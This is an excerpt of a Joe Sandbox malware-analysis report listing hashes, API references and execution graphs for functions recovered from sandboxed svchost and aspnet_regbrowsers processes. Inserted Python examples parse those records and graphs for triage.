                                • Instruction ID: 489f16b01614a6ad857ed6fed0170234db92dd19ecd54c1fed5fca011597db79
                                • Opcode Fuzzy Hash: 3294c5e098798065ce29242c5eac8139c7641e437b828ec15f840bc5dd7eb2b7
                                • Instruction Fuzzy Hash: 9A21BC70A04B068FD770DF2AD848656B7F1BB48320B108F2DD4AAD76A4E7B4E645CBD0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 49f346b1a2353812024932671e88b6385438793feecf20ce8229c8b1e9a5e88c
                                • Instruction ID: 6ee4d0db467204041fe10f035736377b81ae18fb8c841436575f7a8e414c1c0b
                                • Opcode Fuzzy Hash: 49f346b1a2353812024932671e88b6385438793feecf20ce8229c8b1e9a5e88c
                                • Instruction Fuzzy Hash: B6119A357007128FD724EBA8D88492EB7A6FFC4268B158A2DD64B8B710DF71ED058B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a1f132f2e003cfc55cebf7998184924772d95a28452e3222c9373998a5e44883
                                • Instruction ID: 642b0b8dedb43ad6988dc79a6bbcd875e384bce70eb6fdb1c49b9a5964a8e9c6
                                • Opcode Fuzzy Hash: a1f132f2e003cfc55cebf7998184924772d95a28452e3222c9373998a5e44883
                                • Instruction Fuzzy Hash: F21108713046045BCB24EF69E451A6EB7A7BFC4254F508D2DD54A8B790DF70DC058BB1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.803658156.0000000001B5D000.00000040.00000001.sdmp, Offset: 01B5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_1b5d000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4a6d69dcac19fdb8a3552707fc77d34c4a78638005edc64a4181cec70993955
                                • Instruction ID: e562ce98a6e583c42556010d7a83c187959a22c1e56267a004fc50d1fd19c382
                                • Opcode Fuzzy Hash: a4a6d69dcac19fdb8a3552707fc77d34c4a78638005edc64a4181cec70993955
                                • Instruction Fuzzy Hash: E611A975504280CFDB0ACF54D984B15BBA1EB84224F28C6AADC494B656C33AD44ACB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f5945f05146feff2ad0268f6158b2067844a44aac848851cbf6e3fbf5a7a9b2e
                                • Instruction ID: 458d3fca2ac7d73033184d48280854d46d2393e16afc1ed3a74e9b7e8bf052c9
                                • Opcode Fuzzy Hash: f5945f05146feff2ad0268f6158b2067844a44aac848851cbf6e3fbf5a7a9b2e
                                • Instruction Fuzzy Hash: D7116030A042098BDB14DF6AD5586EEB7B2FF8C600F24C869D402B7394DB745D44CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 43f81539b61d733817681ff278364e7e89771701154719c56d313f4075eecdae
                                • Instruction ID: 141c6c1b105784105c5bce117731d6158f0622c20a25a44c4f7ef5bdcf78d0ee
                                • Opcode Fuzzy Hash: 43f81539b61d733817681ff278364e7e89771701154719c56d313f4075eecdae
                                • Instruction Fuzzy Hash: 2C1154302047015B8728DF25E44485AB7A7FFC5628324CE6DD15A8B250DF71AC068BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c3423c59ddae239dcef1ff2941dbcf96aed867c5f74d559479f44c93884dd0a1
                                • Instruction ID: a7c283305f67043244bd0ec69cca10b622979699692da9b1317eead8f746d881
                                • Opcode Fuzzy Hash: c3423c59ddae239dcef1ff2941dbcf96aed867c5f74d559479f44c93884dd0a1
                                • Instruction Fuzzy Hash: A8017031A043009FCB199B74E4487A83BE5EF46505F2644D5D80BDB363DF65DC4287D1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 96fd50b7b867d623e8b198e3d27959e4af422ef62b79f3a98bb17bf55aa9a988
                                • Instruction ID: e30890b7bae4c33a7f4abd9b76322c1753240162b7d9fa61b026d1c383335e96
                                • Opcode Fuzzy Hash: 96fd50b7b867d623e8b198e3d27959e4af422ef62b79f3a98bb17bf55aa9a988
                                • Instruction Fuzzy Hash: 8301D43D7003106BDB0913A869117F92777EFC6B08F20809DEA01ABBC6CAFE1C155752
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e03ad6a143097f741ceb33e5a405a0f9b2b063a67fa6357e731df35df4e632e5
                                • Instruction ID: b4b88d8375db2c9c555d89f985f28a52aed06df03ddc6fe0680b34796adb3dea
                                • Opcode Fuzzy Hash: e03ad6a143097f741ceb33e5a405a0f9b2b063a67fa6357e731df35df4e632e5
                                • Instruction Fuzzy Hash: 28F0313D74021467EA0816A86D117F92767DBC9B04F10805DE6056ABCACEFB6C155396
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d86bec1f1b2172b72f3e2907d82cc81296524938547c4a59f5ace29208db5ef1
                                • Instruction ID: c803110f07a2732971844e1416e74c92062c403ad5df1bb50ca070efae51f3ea
                                • Opcode Fuzzy Hash: d86bec1f1b2172b72f3e2907d82cc81296524938547c4a59f5ace29208db5ef1
                                • Instruction Fuzzy Hash: ED01F9357001008FCB58DB78D444A6933E6EFC961172180A8ED0ADB365CF75DC518791
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 75532d493ce1a66193d830445cf06e8ce7b27790fd5f03dc2a5c5a1e8304e259
                                • Instruction ID: de8b4f5db7afb05cd4a4b07ed9edf74ce45d336992c88d665aec82496655e7cf
                                • Opcode Fuzzy Hash: 75532d493ce1a66193d830445cf06e8ce7b27790fd5f03dc2a5c5a1e8304e259
                                • Instruction Fuzzy Hash: F9E026303402205FC710DB79D804B6477E99F8C621F1480A9FA4ACB3A2EA609C50C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 514bf65e24d4d5b417ce14cb6379fe170e4fc9c678d2f2f414526e634677b11f
                                • Instruction ID: 5d6f0f7fb34d844685d488659dbaeea9648f63e63961500dbca22623dbf6429e
                                • Opcode Fuzzy Hash: 514bf65e24d4d5b417ce14cb6379fe170e4fc9c678d2f2f414526e634677b11f
                                • Instruction Fuzzy Hash: 7CE0DF7090628ADFCB99DF74AA0169D7BB1EF01208B2084DEDC08E3251E7341E04A700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 43ef983df146c931269ae7618af7848d9f7e876bf1f9c728f5c9e8b29084a1a8
                                • Instruction ID: cca4564b3a7c8079984496ccb233763c4c92a2faaeebfce38e0701a3cc9643d2
                                • Opcode Fuzzy Hash: 43ef983df146c931269ae7618af7848d9f7e876bf1f9c728f5c9e8b29084a1a8
                                • Instruction Fuzzy Hash: 35E0B674E0420CAFCB44EFB8E44459DBBF5AF48218F0185E99909E7350EB746E44CF81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 32858bbbdef938a9b45c3b6ead1e9cd60591bc422355cdabfaa1f7efe629f79b
                                • Instruction ID: ef256c8145c5b9170017bca3398a996205c995753ad8b83e241d09c7c1f59a95
                                • Opcode Fuzzy Hash: 32858bbbdef938a9b45c3b6ead1e9cd60591bc422355cdabfaa1f7efe629f79b
                                • Instruction Fuzzy Hash: 29D0A932B001204F8708EBACE80489833EAAF8A12530080AAE00ACB331DE20EC81C780
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0bf971a1122bc4ae72759a5159d6a68b36d032653ae525947a80be0c89be8aa3
                                • Instruction ID: 62a8dc6571bbe2f47af91aa72e8101d58f47398248bce78f5ecf6a3b82acd06d
                                • Opcode Fuzzy Hash: 0bf971a1122bc4ae72759a5159d6a68b36d032653ae525947a80be0c89be8aa3
                                • Instruction Fuzzy Hash: 10D01270901109EF8B84DFA9E60155DB7F9EB44104B1085D9D808D3210DB312E009740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 55c20adcde1018b6330a5d3fe3266cbc2fea2e86e596031e0f2f2acd3345d13b
                                • Instruction ID: a2fbe0bb439c72f16f67e6a1c8631fb55c9f7ed2b1641f76498db6d2af03c257
                                • Opcode Fuzzy Hash: 55c20adcde1018b6330a5d3fe3266cbc2fea2e86e596031e0f2f2acd3345d13b
                                • Instruction Fuzzy Hash: 6BD0A7347402448FC744DF78E04492573B6EBC96113208098ED0DCB366CF31EC508B51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40c45618b0857e2ec126c04f680551870e2d400efda1415b15aa9100579cca5f
                                • Instruction ID: 9d7f6caa3995c045baf81117a0c16e5ba3a3906771641ece32c80aacf67b32f9
                                • Opcode Fuzzy Hash: 40c45618b0857e2ec126c04f680551870e2d400efda1415b15aa9100579cca5f
                                • Instruction Fuzzy Hash: 30B0927090930CAF8610DAA9980191AB7ACDA0A118B0206D9EA0887310DA72AD105AD2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ff00fb279385ad464e502bef8441b5703e6172921154b95bc462c4907efb7f6f
                                • Instruction ID: 2cddb018488413d2e90e2148d919d9f5f7439e99c802e76cb6ac4abc24c95eea
                                • Opcode Fuzzy Hash: ff00fb279385ad464e502bef8441b5703e6172921154b95bc462c4907efb7f6f
                                • Instruction Fuzzy Hash: 1DB0127004470D6F8680BBA0F406C54371D968061D7808D50D20C860319EA468D58688
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9356bb5ccea945c8e034a45183a01d6285c27660127d61ddd53b35643ccf2328
                                • Instruction ID: 1838e275c2923d5f917afa2e05ff59c94d8e1526511b89e3e20eccd99f6f36e6
                                • Opcode Fuzzy Hash: 9356bb5ccea945c8e034a45183a01d6285c27660127d61ddd53b35643ccf2328
                                • Instruction Fuzzy Hash: 1DB0123000860D8B8740EBA4F60548C372D96C051D790C550970C874165E686854468C
                                Uniqueness

                                Uniqueness Score: -1.00%
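
Each block above is one recovered function: the exact IDs identify it, the fuzzy hashes are what you match across dumps and samples, and the snapshot filename tells you which process the dump came from. The following Python is an added example, not part of the Joe Sandbox report and not Joe Sandbox tooling; it parses records in the exact text layout used on this page (including the optional APIs list that precedes some records) and summarises them per process. The two embedded records are copied from this report so the script runs offline; the dict keys, the process-name extraction from the snapshot filename, and the choice of the Instruction Fuzzy Hash as pivot key are this example's own assumptions.

```python
"""Parse the per-function records a Joe Sandbox report prints ("Memory Dump
Source" / "Similarity" / "Uniqueness" blocks) into dicts and summarise them.
Added example, not part of the report and not Joe Sandbox code. SAMPLE is two
records copied from this report; dict keys and the process-name extraction are
this example's own conventions (assumption: snapshot files are always named
hcaresult_<index>_<n>_<base>_<process>.jbxd, as they are on this page)."""
import re
from collections import Counter

SAMPLE = """\
Memory Dump Source
• Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 157242c2d35519a8842e2c92e8d8863c78848c6a5c8a695042affb65d0af6f35
• Instruction ID: cb4e5bfc983d9199de53d8cf6e54977fb37dbd9277ac9e4d63ec2e410b2b3a88
• Opcode Fuzzy Hash: 157242c2d35519a8842e2c92e8d8863c78848c6a5c8a695042affb65d0af6f35
• Instruction Fuzzy Hash: 6611E7352046458FC710DB18D480C66FBEAAF453A4729CEAAE45AC7752D730FC46C791
Uniqueness

Uniqueness Score: -1.00%
APIs
• GetCurrentProcess.KERNEL32 ref: 013A6B60
• GetCurrentThread.KERNEL32 ref: 013A6B9D
• GetCurrentProcess.KERNEL32 ref: 013A6BDA
• GetCurrentThreadId.KERNEL32 ref: 013A6C33
Memory Dump Source
• Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 869a8d7e233ea23406d619c6228889b8675aa768de4eaa54a90184dd575705c3
• Instruction ID: 9866a8bdb7e0e9d4fc29925a305af7b29b2e13f42e6e1f51511e77301d1224fa
• Opcode Fuzzy Hash: 869a8d7e233ea23406d619c6228889b8675aa768de4eaa54a90184dd575705c3
• Instruction Fuzzy Hash: 9E5188B09042888FDB54CFAAD549BDEBFF0EF89304F24849EE559A7391DB345884CB61
Uniqueness

Uniqueness Score: -1.00%
"""

# "• Name: value" metadata lines. The name never contains ".", so API-call
# bullets such as "• GetCurrentProcess.KERNEL32 ref: 013A6B60" do not match here.
FIELD = re.compile(r"^• ([A-Za-z ]+): ?(.*)$")
# "• Api.MODULE ref: ADDR" or "• Api.MODULE(args), ref: ADDR"
API_CALL = re.compile(r"^• (\w+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-Fa-f]+)$")
SCORE = re.compile(r"^Uniqueness Score: (.+)$")
SNAPSHOT = re.compile(r"hcaresult_(\d+)_\d+_[0-9a-f]+_(.+)\.jbxd")

def parse_records(text):
    """One dict per record; a record closes at its 'Uniqueness Score' line."""
    records, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        m = API_CALL.match(line)
        if m:  # (name, module, address) of an import reference inside the function
            cur["apis"].append((m.group(1), m.group(2), int(m.group(4), 16)))
            continue
        m = FIELD.match(line)
        if m:
            key, val = m.group(1), m.group(2).strip()
            if key == "Source File":
                # one value packs three facts: "<file>, Offset: <hex>, based on PE: <bool>"
                path, off, pe = (p.strip() for p in val.split(","))
                cur["source_file"] = path
                cur["offset"] = int(off.split(":")[1], 16)
                cur["based_on_pe"] = pe.endswith("true")
            else:
                cur[key.lower().replace(" ", "_")] = val
            continue
        m = SCORE.match(line)
        if m:
            cur["uniqueness"] = m.group(1)
            s = SNAPSHOT.search(cur.get("snapshot_file", ""))
            cur["process_index"], cur["process"] = (int(s.group(1)), s.group(2)) if s else (None, None)
            records.append(cur)
            cur = {"apis": []}
    return records

def count_by_process(records):
    """Functions recovered per (injected) process, e.g. svchost vs aspnet_regbrowsers."""
    return Counter(r["process"] for r in records)

def api_calling(records):
    """Records that reference at least one import: the ones to triage first."""
    return [r for r in records if r["apis"]]

def by_instruction_fuzzy_hash(records):
    # Pivot key for cross-sample matching: a fuzzy hash tolerates small
    # differences that the exact Opcode/Instruction IDs do not.
    return {r["instruction_fuzzy_hash"]: r for r in records}

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(dict(count_by_process(recs)))
    for r in api_calling(recs):
        print(r["process"], r["api_id"], [f"{n}.{mod}@{a:08X}" for n, mod, a in r["apis"]])
```

Feed it the whole report text and `count_by_process` gives the per-process function counts directly, while `by_instruction_fuzzy_hash` built over several reports shows which functions recur between samples.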

                                Non-executed Functions

                                Execution Graph

                                Execution Coverage: 6.6%
                                Dynamic/Decrypted Code Coverage: 100%
                                Signature Coverage: 0%
                                Total number of Nodes: 63
                                Total number of Limit Nodes: 4

                                Graph

                                execution_graph 24048 13a6d28 DuplicateHandle 24049 13a6dbe 24048->24049 24050 13a5408 24051 13a542e 24050->24051 24054 13a3d74 24051->24054 24057 13a3d7f 24054->24057 24055 13a79a1 24059 13a799f 24055->24059 24070 13a6a34 24055->24070 24057->24055 24058 13a7991 24057->24058 24062 13a7ab8 24058->24062 24066 13a7ac8 24058->24066 24065 13a7ad6 24062->24065 24063 13a6a34 CallWindowProcW 24063->24065 24064 13a7bbf 24064->24059 24065->24063 24065->24064 24068 13a7ad6 24066->24068 24067 13a6a34 CallWindowProcW 24067->24068 24068->24067 24069 13a7bbf 24068->24069 24069->24059 24071 13a6a3f 24070->24071 24072 13a7c8a CallWindowProcW 24071->24072 24073 13a7c39 24071->24073 24072->24073 24073->24059 24044 13a5250 24045 13a52b8 CreateWindowExW 24044->24045 24047 13a5374 24045->24047 24074 13aba20 24075 13aba34 24074->24075 24078 13abc6a 24075->24078 24076 13aba3d 24079 13abc73 24078->24079 24084 13abe4c 24078->24084 24088 13abe66 24078->24088 24092 13abd40 24078->24092 24096 13abd50 24078->24096 24079->24076 24085 13abdff 24084->24085 24086 13abe8b 24085->24086 24100 13ac147 24085->24100 24089 13abe79 24088->24089 24090 13abe8b 24088->24090 24091 13ac147 2 API calls 24089->24091 24091->24090 24093 13abd94 24092->24093 24094 13abe8b 24093->24094 24095 13ac147 2 API calls 24093->24095 24095->24094 24097 13abd94 24096->24097 24098 13abe8b 24097->24098 24099 13ac147 2 API calls 24097->24099 24099->24098 24101 13ac166 24100->24101 24105 13ac1a8 24101->24105 24109 13ac198 24101->24109 24102 13ac176 24102->24086 24106 13ac1e2 24105->24106 24107 13ac235 24106->24107 24108 13ac20c RtlEncodePointer 24106->24108 24107->24102 24108->24107 24110 13ac1a8 24109->24110 24111 13ac20c RtlEncodePointer 24110->24111 24112 13ac235 24110->24112 24111->24112 24112->24102 24113 13a6b00 GetCurrentProcess 24114 13a6b7a GetCurrentThread 24113->24114 24115 13a6b73 24113->24115 24116 13a6bb0 24114->24116 24117 13a6bb7 GetCurrentProcess 24114->24117 24115->24114 
24116->24117 24120 13a6bed 24117->24120 24118 13a6c15 GetCurrentThreadId 24119 13a6c46 24118->24119 24120->24118
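
The execution_graph line above (and the control_flow_graph lines further down) are the text form of the rendered graphs: node records of the form `<id> <address or address range> [label]` followed by `<src>-><dst>` edges, where a label is an import name or a collapsed marker such as `2 API calls`. The Python below is an added example, not part of the report and not Joe Sandbox tooling; it parses that serialisation, finds the entry points (nodes with no incoming edge) and lists the imports each entry point reaches, which is the first question a triager asks of such a graph. The two embedded dumps are copied from this page; the rule that a numeric token followed by a hex address starts a node record, and the treatment of single-token labels as import names, are this example's own assumptions.

```python
"""Parse the execution_graph / control_flow_graph text dumps of a Joe Sandbox
report and reduce them to "which imports does each entry point reach".
Added example; not part of the report and not Joe Sandbox code. EXEC_GRAPH and
CFG are copied from this page. Assumption: a numeric token followed by a hex
address (or address range) starts a node record, and everything after the
address up to the next node or edge is that node's label (an import name, or a
collapsed marker such as "2 API calls")."""
import re
from collections import defaultdict

EXEC_GRAPH = (
    "execution_graph 24048 13a6d28 DuplicateHandle 24049 13a6dbe 24048->24049 24050 13a5408 24051 13a542e "
    "24050->24051 24054 13a3d74 24051->24054 24057 13a3d7f 24054->24057 24055 13a79a1 24059 13a799f "
    "24055->24059 24070 13a6a34 24055->24070 24057->24055 24058 13a7991 24057->24058 24062 13a7ab8 "
    "24058->24062 24066 13a7ac8 24058->24066 24065 13a7ad6 24062->24065 24063 13a6a34 CallWindowProcW "
    "24063->24065 24064 13a7bbf 24064->24059 24065->24063 24065->24064 24068 13a7ad6 24066->24068 "
    "24067 13a6a34 CallWindowProcW 24067->24068 24068->24067 24069 13a7bbf 24068->24069 24069->24059 "
    "24071 13a6a3f 24070->24071 24072 13a7c8a CallWindowProcW 24071->24072 24073 13a7c39 24071->24073 "
    "24072->24073 24073->24059 24044 13a5250 24045 13a52b8 CreateWindowExW 24044->24045 24047 13a5374 "
    "24045->24047 24074 13aba20 24075 13aba34 24074->24075 24078 13abc6a 24075->24078 24076 13aba3d "
    "24079 13abc73 24078->24079 24084 13abe4c 24078->24084 24088 13abe66 24078->24088 24092 13abd40 "
    "24078->24092 24096 13abd50 24078->24096 24079->24076 24085 13abdff 24084->24085 24086 13abe8b "
    "24085->24086 24100 13ac147 24085->24100 24089 13abe79 24088->24089 24090 13abe8b 24088->24090 "
    "24091 13ac147 2 API calls 24089->24091 24091->24090 24093 13abd94 24092->24093 24094 13abe8b "
    "24093->24094 24095 13ac147 2 API calls 24093->24095 24095->24094 24097 13abd94 24096->24097 "
    "24098 13abe8b 24097->24098 24099 13ac147 2 API calls 24097->24099 24099->24098 24101 13ac166 "
    "24100->24101 24105 13ac1a8 24101->24105 24109 13ac198 24101->24109 24102 13ac176 24102->24086 "
    "24106 13ac1e2 24105->24106 24107 13ac235 24106->24107 24108 13ac20c RtlEncodePointer 24106->24108 "
    "24107->24102 24108->24107 24110 13ac1a8 24109->24110 24111 13ac20c RtlEncodePointer 24110->24111 "
    "24112 13ac235 24110->24112 24111->24112 24112->24102 24113 13a6b00 GetCurrentProcess "
    "24114 13a6b7a GetCurrentThread 24113->24114 24115 13a6b73 24113->24115 24116 13a6bb0 24114->24116 "
    "24117 13a6bb7 GetCurrentProcess 24114->24117 24115->24114 24116->24117 24120 13a6bed 24117->24120 "
    "24118 13a6c15 GetCurrentThreadId 24119 13a6c46 24118->24119 24120->24118"
)
CFG = (
    "control_flow_graph 38 13a5244-13a52b6 39 13a52b8-13a52be 40 13a52c1-13a52c8 38->39 38->40 39->40 "
    "41 13a52ca-13a52d0 40->41 42 13a52d3-13a530b 40->42 41->42 43 13a5313-13a5372 CreateWindowExW "
    "42->43 44 13a537b-13a53b3 43->44 45 13a5374-13a537a 43->45 49 13a53c0 44->49 50 13a53b5-13a53b8 "
    "44->50 45->44 51 13a53c1 49->51 50->49 51->51"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")  # "13a6d28" or a block range "13a5244-13a52b6"

def _starts_node(tokens, i):
    return tokens[i].isdigit() and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]) is not None

def parse_graph(dump):
    """Return (nodes, edges): nodes maps id -> (address, label); edges is a list of (src, dst)."""
    tokens = dump.split()
    if tokens and tokens[0].endswith("_graph"):  # leading "execution_graph" / "control_flow_graph"
        tokens = tokens[1:]
    nodes, edges, i = {}, [], 0
    while i < len(tokens):
        m = EDGE.match(tokens[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        nid, addr, i = int(tokens[i]), tokens[i + 1], i + 2
        label = []
        while i < len(tokens) and not EDGE.match(tokens[i]) and not _starts_node(tokens, i):
            label.append(tokens[i])
            i += 1
        nodes[nid] = (addr, " ".join(label))
    return nodes, edges

def entry_points(nodes, edges):
    """Node ids that no edge points to: the roots of the graph."""
    targets = {dst for _, dst in edges}
    return [n for n in nodes if n not in targets]

def is_import(label):
    # A single-token label is an import name; "2 API calls" marks a collapsed subgraph.
    return bool(label) and " " not in label

def imports_reachable(nodes, edges):
    """Map each entry point's address to the sorted imports reachable from it."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    result = {}
    for root in entry_points(nodes, edges):
        seen, stack, found = set(), [root], set()
        while stack:  # iterative DFS; the dumps contain cycles (e.g. 51->51), so track seen
            n = stack.pop()
            if n in seen:
                continue
            seen.add(n)
            _addr, label = nodes.get(n, ("?", ""))
            if is_import(label):
                found.add(label)
            stack.extend(succ[n])
        result[nodes[root][0]] = sorted(found)
    return result

def import_sites(nodes):
    """Unique (address, import) pairs: where to put breakpoints or start reading."""
    return sorted({(addr, label) for addr, label in nodes.values() if is_import(label)})

if __name__ == "__main__":
    for dump in (EXEC_GRAPH, CFG):
        nodes, edges = parse_graph(dump)
        print(len(nodes), "nodes,", len(edges), "edges:", imports_reachable(nodes, edges))
```

On this page's execution graph the parser recovers the 63 nodes the report counts and five entry points: 13a6d28 (DuplicateHandle), 13a5408 (CallWindowProcW), 13a5250 (CreateWindowExW), 13aba20 (RtlEncodePointer) and 13a6b00 (GetCurrentProcess, GetCurrentThread, GetCurrentThreadId). The same parser handles the basic-block ranges of a control_flow_graph dump, so one script serves both graph types in the report.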

                                Executed Functions

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 013A6B60
                                • GetCurrentThread.KERNEL32 ref: 013A6B9D
                                • GetCurrentProcess.KERNEL32 ref: 013A6BDA
                                • GetCurrentThreadId.KERNEL32 ref: 013A6C33
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 869a8d7e233ea23406d619c6228889b8675aa768de4eaa54a90184dd575705c3
                                • Instruction ID: 9866a8bdb7e0e9d4fc29925a305af7b29b2e13f42e6e1f51511e77301d1224fa
                                • Opcode Fuzzy Hash: 869a8d7e233ea23406d619c6228889b8675aa768de4eaa54a90184dd575705c3
                                • Instruction Fuzzy Hash: 9E5188B09042888FDB54CFAAD549BDEBFF0EF89304F24849EE559A7391DB345884CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
